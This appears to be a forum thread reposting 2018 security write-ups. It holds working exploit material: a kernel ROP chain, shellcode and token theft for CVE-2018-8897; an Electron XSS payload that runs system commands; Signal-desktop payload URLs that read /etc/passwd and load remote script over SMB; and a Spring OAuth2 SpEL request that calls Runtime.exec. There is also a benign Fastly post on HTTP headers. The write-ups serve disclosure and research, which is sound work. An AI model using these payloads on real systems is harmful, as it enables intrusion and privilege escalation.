RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it. Thread logic will be like the following: volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode. The final chain will look something like: -- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010) In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below: NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); } We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete! Let’s make a simple demo stealing the System token: uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken ); Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897 Credits: @0xNemi and @nickeverdox for finding the vulnerability P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try! P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code: Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
  20. CVE-2018-1000136 - Electron nodeIntegration Bypass May 10, 2018 Posted By Brendan Scarvell Comments (2) A few weeks ago, I came across a vulnerability that affected all current versions of Electron at the time (< 1.7.13, < 1.8.4, and < 2.0.0-beta.3). The vulnerability allowed nodeIntegration to be re-enabled, leading to the potential for remote code execution. If you're unfamiliar with Electron, it is a popular framework that allows you to create cross-platform desktop applications using HTML, CSS, and JavaScript. Some popular applications such as Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop are all built using the Electron framework. You can find a list of applications built with Electron here. Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side. Atom had an XSS vulnerability not too long ago which did exactly that. You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences. There's also a WebView tag feature which allows you to embed content, such as web pages, into your Electron application and run it as a separate process. When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default. The documentation states that if the webviewTag option is not explicitly declared in your webPreferences, it will inherit the same permissions of whatever the value of nodeIntegration is set to. By default, Electron also uses its own custom window.open() function which creates a new instance of a BrowserWindow. The child window will inherit all of the parent window's options (which includes its webPreferences) by default. The custom window.open() function does allow you to override some of the inherited options by passing in a featuresargument: if (!usesNativeWindowOpen) { // Make the browser window or guest view emit "new-window" event. window.open = function (url, frameName, features) { if (url != null && url !== '') { url = resolveURL(url) } const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features)) if (guestId != null) { return getOrCreateProxy(ipcRenderer, guestId) } else { return null } } if (openerId != null) { window.opener = getOrCreateProxy(ipcRenderer, openerId) } } When Electron's custom window.open function is called, it emits an ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPENevent. The ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPENevent handler then parses the features provided, adding them as options to the newly created window and then emits an ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPENevent. To prevent child windows from being able to do nasty things like re-enabling nodeIntegration when the parent window has it explicitly disabled, guest-window-manager.js contains a hardcoded list of webPreferences options and their restrictive values: // Security options that child windows will always inherit from parent windows const inheritedWebPreferences = new Map([ ['contextIsolation', true], ['javascript', false], ['nativeWindowOpen', true], ['nodeIntegration', false], ['sandbox', true], ['webviewTag', false] ]); The ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event handler then calls the mergeBrowserWindowOptionsfunction which ensures that the restricted attributes of the parent window's webPreferences are applied to the child window: const mergeBrowserWindowOptions = function (embedder, options) { [...] // Inherit certain option values from parent window for (const [name, value] of inheritedWebPreferences) { if (embedder.getWebPreferences()[name] === value) { options.webPreferences[name] = value } } // Sets correct openerId here to give correct options to 'new-window' event handler options.webPreferences.openerId = embedder.id return options } And here is where the vulnerability lays. The mergeBrowserWindowOptions function didn't take into account what the default values of these restricted attributes should be if they were undefined. In other words, if webviewTag: falsewasn't explicitly declared in your application's webPreferences (and was therefore being inferred by explicitly setting nodeIntegration: false), when mergeBrowserWindowOptions went to check the webviewTag, it would then come back undefined thus making the above if statement return false and not apply the parent's webviewTag preference. This allowed window.open to pass the webviewTag option as an additional feature, re-enabling nodeIntegration and allowing the potential for remote code execution. The following proof-of-concept shows how an XSS payload can re-enable nodeIntegration during run time and allow execution of system commands: <script> var x = window.open('data://yoloswag','','webviewTag=yes,show=no'); x.eval( "var webview = new WebView;"+ "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+ "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+ "document.body.appendChild(webview)" ); </script> If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3) , and hasn't manually opted into one of the following: Declared webviewTag: false in its webPreferences. Enabled the nativeWindowOption option in its webPreferences. Intercepting new-window events and overriding event.newGuest without using the supplied options tag. We'd also like to thank the Electron team for being extremely responsive and for quickly providing a patch to the public. This vulnerability was assigned the CVE identifier CVE-2018-1000136. Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/
  21. “Client-Side” CSRF Facebook Bug Bounty·Friday, May 11, 2018 At Facebook, the Whitehat program receives hundreds of submissions a month, covering a wide range of vulnerability types. One of the interesting classes of issue which we've seen recently is what we've termed “Client-Side” Cross-Site Request Forgery (CSRF), which we've awarded on average $7.5k. What is CSRF? Before we jump into technical details, let's recap on what CSRF is. This is a class of issue in which an attacker can perform a state changing action, such as posting a status, on behalf of another user. This is made possible due to the fact that browsers (currently, until Same-Site Cookies are supported in all major browsers) send the user's cookies with a request, regardless of the request origin. At Facebook, like other large sites, we have protections in place to mitigate this kind of attack. The most common type of protection is by adding a random token to each state-changing request, and verifying this server-side. An attacker has no way of knowing this value in advance, which means we can ensure any request has explicitly been made by the user. If you're participating in our Whitehat program, then you might see this token being sent - we name it “fb_dtsg”. “Client-Side” CSRF Whilst most researchers think of CSRF as a server-side problem, “Client-Side” CSRF exists in the user's browser or mobile device - a malicious user could perform arbitrary requests to a CSRF-protected end-point, by modifying the end-point to which the client-side code makes an HTTP request to with a valid CSRF token. This could be a form submission, or an XHR call. For example, a product might want to log some analytic data after the page is loaded, which could look the following code: let analytic_uri = window.location.hash.substr(1); (new AsyncRequest(“/ajax” + analytic_uri)) .method(POST) .setBody({csrf_token: csrf_token}) .send() The user would browse to /profile.php#/profile/log. On page load, the JS would make a POST request to “/ajax/profile/log”, and the data saved. However, if an attacker modifies the fragment to “#/updatestatus?status=Hello”, then the JS is instead making a request to update the user's status, with a valid CSRF token. One good trick for hunting for these kind of issues is looking for HTTP requests which are made after the page is rendered - if the end-point being requested is contained in the page's query string or fragment, then it's worth investigating! If you can only control part of the end-point, then it could still be vulnerable, by using tricks like path traversal. Making arbitrary GraphQL requests We had a great submission from one of our top researchers, Philippe Harewood, which used this style of issue to make arbitrary GraphQL on behalf of another user, for which we rewarded him $7,500. On https://business.instagram.com, we had a page which took a business ID from the request, and made a Graph API request to that particular business: POST /[business_id]?fields=... access_token=... Facebook's Graph API is protected against CSRF by requiring a valid access token from the user. Without this token, the request is un-authenticated. Philippe found that since the business ID wasn't validated to be an integer, he could change this to point to our GraphQL end-point (graphql), and make authenticated requests for the user (such as posting a new status), since the JS was making the request with the access token: POST /graphql?q=Mutation...&fields=... access_token=... This is a great example of influencing authenticated requests to point somewhere completely unintended. Conclusion These issues are an interesting and novel take on an older class of bugs, which has prompted us to take a look at ways of detecting and mitigating bugs in JS. If you too enjoy investigating and solving novel bugs, then come join the ProdSec team! Sursa: https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/
  22. signal-desktop HTML tag injection advisory Title: Signal-desktop HTML tag injection Date Published: 2018-05-14 Last Update: 2018-05-14 CVE Name: CVE-2018-10994 Class: Code injection Remotely Exploitable: Yes Locally Exploitable: No Vendors contacted: Signal.org Vulnerability Description: Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (Cross-site scripting). Vulnerable Packages: Signal-desktop messenger v1.7.1 Signal-desktop messenger v1.8.0 Signal-desktop messenger v1.9.0 Signal-desktop messenger v1.10.0 Originally found in v1.9.0 and v1.10.0, but after reviewing the source code the aforementioned are the impacted versions. Solution/Vendor Information/Workaround Upgrade to Signal-desktop messenger v1.10.1 or v1.11.0-beta.3 For safer communications on desktop systems, please consider the use of a safer end-point client like PGP or GnuPG instead. Credits: This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos). Technical Description – Exploit/Concept Code While discussing a XSS vulnerability on a website using the Signal-desktop messenger, it was found that the messenger software also displayed a code-injection vulnerability while parsing the affected URLs. The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable. In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in a SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the signal-desktop client by sending a specially crafted message. Examples: Show an iframe with some text: http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E Display content of user’s own /etc/passwd file: http://hacktheplanet/?p=%3d%3Ciframe%20src=/etc/passwd%3E Include and execute a remote JavaScript file (for Windows clients): http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E Show a base64-encoded image (bypass “click to download image”): http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e Timeline: 2018-05-10 18:45 GMT-3: vuln discovered 2018-05-11 13:03 GMT-3: emailed Signal security team 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch ongoing 2018-05-11 16:12 GMT-3: patch committed 2018-05-11 18:00 GMT-3: signal-desktop update published 2018-05-14 18:00 GMT-3: public disclosure References: Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…v1.11.0-beta.3 Writeup: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/ Sursa: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/advisory/
      • 1
      • Thanks
  23. The headers we don't want By Andrew Betts | May 10, 2018 If you want to learn more about headers, don’t miss Andrew’s talk at Altitude London on May 22. HTTP headers are an important way of controlling how caches and browsers process your web content. But many are used incorrectly or pointlessly, which adds overhead at a critical time in the loading of your page, and may not work as you intended. In this first of a series of posts about header best practice, we’ll look at unnecessary headers. Most developers know about and depend on a variety of HTTP headers to make their content work. Those that are best known include Content-Type and Content-Length, which are both almost universal. But more recently, headers such as Content-Security-Policy and Strict-Transport-Security have started to improve security, and Link rel=preload headers to improve performance. Few sites use these, despite their wide support across browsers. At the same time, there are lots of headers that are hugely popular but aren’t new and aren’t actually all that useful. We can prove this using HTTP Archive, a project run by Google and sponsored by Fastly that loads 500,000 websites every month using WebPageTest, and makes the results available in BigQuery. From the HTTP Archive data, here are the 30 most popular response headers (based on the number of domains in the archive which are serving each header), and roughly how useful each one is: Header name Requests Domains Status date 48779277 535621 Required by protocol content-type 47185627 533636 Usually required by browser server 43057807 519663 Unnecessary content-length 42388435 519118 Useful last-modified 34424562 480294 Useful cache-control 36490878 412943 Useful etag 23620444 412370 Useful content-encoding 16194121 409159 Required for compressed content expires 29869228 360311 Unnecessary x-powered-by 4883204 211409 Unnecessary pragma 7641647 188784 Unnecessary x-frame-options 3670032 105846 Unnecessary access-control-allow-origin 11335681 103596 Useful x-content-type-options 11071560 94590 Useful link 1212329 87475 Useful age 7401415 59242 Useful x-cache 5275343 56889 Unnecessary x-xss-protection 9773906 51810 Useful strict-transport-security 4259121 51283 Useful via 4020117 47102 Unnecessary p3p 8282840 44308 Unnecessary expect-ct 2685280 40465 Useful content-language 334081 37927 Debatable x-aspnet-version 676128 33473 Unnecessary access-control-allow-credentials 2804382 30346 Useful x-robots-tag 179177 24911 Not relevant to browsers x-ua-compatible 489056 24811 Unnecessary access-control-allow-methods 1626129 20791 Useful access-control-allow-headers 1205735 19120 Useful Let’s look at the unnecessary headers and see why we don’t need them, and what we can do about it. Vanity (server, x-powered-by, via) You may be very proud of your choice of server software, but most people couldn’t care less. At worst, these headers might be divulging sensitive data that makes your site easier to attack. Server: apache X-Powered-By: PHP/5.1.1 Via: 1.1 varnish, 1.1 squid RFC7231 allows for servers to include a Server header in the response, identifying the software used to serve the content. This is most commonly a string like “apache” or “nginx”. While it’s allowed, it’s not mandatory, and offers very little value to either developers or end users. Nevertheless, this is the third most popular HTTP response header on the web today. X-Powered-By is the most popular header in our list that is not defined in any standard, and has a similar purpose, though normally refers to the application platform that sits behind the web server. Common values include “ASP.net”, “PHP” and “Express”. Again this isn’t providing any tangible benefit and is taking up space. More debatable perhaps is Via, which is required (by RFC7230) to be added to the request by any proxy through which it passes to identify the proxy. This can be the proxy’s hostname, but is more likely to be a generic identifier like “vegur”, “varnish”, or “squid”. Removing (or not setting) this header on a request can cause proxy forwarding loops. However, interestingly it is also copied into the response on the way back to the browser, and here it’s just informational and no browsers do anything with it, so it’s reasonably safe to get rid of it if you want to. Deprecated standards (P3P, Expires, X-Frame-Options, X-UA-Compatible) Another category of headers is those that do have an effect in the browser but are not (or are no longer) the best way of achieving that effect. P3P: cp="this is not a p3p policy" Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Frame-Options: SAMEORIGIN X-UA-Compatible: IE=edge P3P is a curious animal. I had no idea what this was, and even more curiously, one of the most common values is “this is not a p3p policy”. Well, is it, or isn’t it? The story here goes back to an attempt to standardise a machine readable privacy policy. There was disagreement on how to surface the data in browsers, and only one browser ever implemented the header - Internet Explorer. Even in IE though, P3P didn’t trigger any visual effect to the user; it just needs to be present to permit access to third party cookies in iframes. Some sites even set a non-conforming P3P policy like the one above – even though doing so is on shaky legal ground. Needless to say, reading third party cookies is generally a bad idea, so if you don’t do it, then you won’t need to set a P3P header! Expires is almost unbelievably popular, considering that Cache-Control has been preferred over Expires for 20 years. Where a Cache-Control header includes a max-age directive, any Expires header on the same response will be ignored. But there are a massive number of sites setting both, and the Expires header is most commonly set to Thu, 01 Dec 1994 16:00:00 GMT, because you want your content to not be cached and copy-pasting the example date from the spec is certainly one way of doing that. But there is simply no reason to do this. If you have an Expires header with a date in the past, replace it with: Cache-Control: no-store, private (no-store is a very strong directive not to write the content to persistent storage, so depending on your use case you might actually prefer no-cache for better performance, for example when using back/forward navigation or resuming hibernated tabs) Some of the tools that audit your site will tell you to add an X-Frame-Options header with a value of ‘SAMEORIGIN’. This tells browsers that you are refusing to be framed by another site, and is generally a good defense against clickjacking. However, the same effect can be achieved, with more consistent support and more robust definition of behaviour, by doing: Content-Security-Policy: frame-ancestors 'self' This has the additional benefit of being part of a header (CSP) which you should have anyway for other reasons (more on that later). So you can probably do without X-Frame-Options these days. Finally, back in their IE9 days, Microsoft introduced ‘compatibility view’, and would potentially render a page using the IE8 or IE7 engine, even when the user was browsing with IE9, if the browser thought that the page might require the earlier version to work properly. Those heuristics were not always correct, and developers were able to override them by using an X-UA-Compatible header or meta tag. In fact, this increasingly became a standard part of frameworks like Bootstrap. These days, this header achieves very little - very few people are using browsers that would understand it, and if you are actively maintaining your site it’s very unlikely that you are using technologies that would trigger compatibility view. Debug data (X-ASPNet-Version, X-Cache) It’s kind of astonishing that some of the most popular headers in common use are not in any standard. Essentially this means that somehow, thousands of websites seem to have spontaneously agreed to use a particular header in a particular way. X-Cache: HIT X-Request-ID: 45a336c7-1bd5-4a06-9647-c5aab6d5facf X-ASPNet-Version: 3.2.32 X-AMZN-RequestID: 0d6e39e2-4ecb-11e8-9c2d-fa7ae01bbebc In reality, these ‘unknown’ headers are not separately and independently minted by website developers. They are typically artefacts of using particular server frameworks, software or specific vendors’ services (in this example set, the last header is a common AWS header). X-Cache, in particular, is actually added by Fastly (other CDNs also do this), along with other Fastly-related headers like X-Cache-Hits and X-Served-By. When debugging is enabled, we add even more, such as Fastly-Debug-Path and Fastly-Debug-TTL. These headers are not recognised by any browser, and removing them makes no difference to how your pages are rendered. However, since these headers might provide you, the developer, with useful information, you might like to keep a way to turning them on. Misunderstandings (Pragma) I didn’t expect to be in 2018 writing a post about the Pragma header, but according to our HTTP Archive data it’s still the 11th most popular. Not only was Pragma deprecated as long ago as 1997, but it was never intended to be a response header anyway - as specified, it only has meaning as part of a request. Pragma: no-cache Nevertheless it’s use as a response header is so widespread that some browsers recognise it in this context as well. Today the probability that your response will transit a cache that understands Pragma in a response context, and doesn’t understand Cache-Control, is vanishingly small. If you want to make sure that something isn’t cached, Cache-Control: no-store, private is all you need. Non-Browser (X-Robots-Tag) One header in our top 30 is a non-browser header. X-Robots-Tag is intended to be consumed by a crawler, such as Google or Bing’s bots. Since it has no meaning to a browser, you could choose to only set it when the requesting user-agent is a crawler. Equally, you might decide that this makes testing harder, or perhaps that it violates the terms of service of the search engine. Bugs Finally, it’s worth finishing on an honourable mention for simple bugs. In a request, a Host header makes sense, but seeing it on a response probably means your server is misconfigured somehow (I’d love to know how, exactly). Nevertheless, 68 domains in HTTP archive are returning a Host header in their responses. Removing headers at the edge Fortunately, if your site is behind Fastly, removing headers is pretty easy using VCL. It makes sense that you might want to keep the genuinely useful debug data available to your dev team, but hide it for public users, so that’s easily done by detecting a cookie or inbound HTTP header: unset resp.http.Server; unset resp.http.X-Powered-By; unset resp.http.X-Generator; if (!req.http.Cookie:debug && !req.http.Debug) { unset resp.http.X-Amzn-RequestID; unset resp.http.X-Cache; } In the next post in this series, I’ll be talking about best practices for headers that you should be setting, and how to enable them at the edge Author Andrew Betts |Web Developer and Principal Developer Advocate Sursa: https://www.fastly.com/blog/headers-we-dont-want
  24. Beware of the Magic SpEL(L) – Part 2 (CVE-2018-1260) Written by Philippe Arteau On Tuesday, we released the details of RCE vulnerability affecting Spring Data (CVE-2018-1273). We are now repeating the same exercise for a similar RCE vulnerability in Spring Security OAuth2 (CVE-2018-1260). We are going to present the attack vector, its discovery method and the conditions required for exploitation. This vulnerability also has similarities with another vulnerability disclosed in 2016. The resemblance will be discussed in the section where we review the fix. Analyzing a potential vulnerability It all started by the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of SpelExpressionParser.parseExpression() with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets “${…}”. public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } 1 2 3 4 5 6 7 8 9 10 11 12 public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } The controller class WhitelabelApprovalEndpoint uses this SpelView class to build the approval page for OAuth2 authorization flow. The SpelView class evaluates the string named “template” – see code below – as a Spring Expression. @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map&lt;String, Object&gt; model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } 1 2 3 4 5 6 7 8 @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map&lt;String, Object&gt; model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } Following the methods createTemplate() and createScopes(), we can see that the attribute “scopes” is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user. protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } At this point, we are unsure if the scopes attribute can be controlled by the remote user. While attribute (req.getAttribute(..)) represents session values stored server-side, scope is an optional parameter part of OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template. After some research in the documentation and some manual tests, we found that “scope” is a GET parameter part of the implicit OAuth2 flow. Therefore, the implicit mode would be required for our vulnerable application. Proof-of-Concept and Limitations When testing our application, we realized that the scopes were validated against a scopes whitelist defined by the user/client. If this whitelist is configured, we can’t be creative with the parameter scope. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe. This first request made used the scope “${1338-1}”, see picture below. Based on the response, we now have a confirmation that the scope parameter’s value can reach the SpelView expression evaluation. We can see in the resulting HTML multiples instances of the string “scope.1337”. Pushing the probe value ${1338-1} A second test was made using the expression “${T(java.lang.Runtime).getRuntime().exec(“calc.exe”)}” to verify that the expressions are not limited to simple arithmetic operations. Simple proof-of-concept request spawning a calc.exe subprocess For easier reproduction, here is the raw HTTP request from the previous screenshot. Some characters – mainly curly brackets – were not supported by the web container and needed to be URL encoded in order to reach the application. { -> %7b POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me 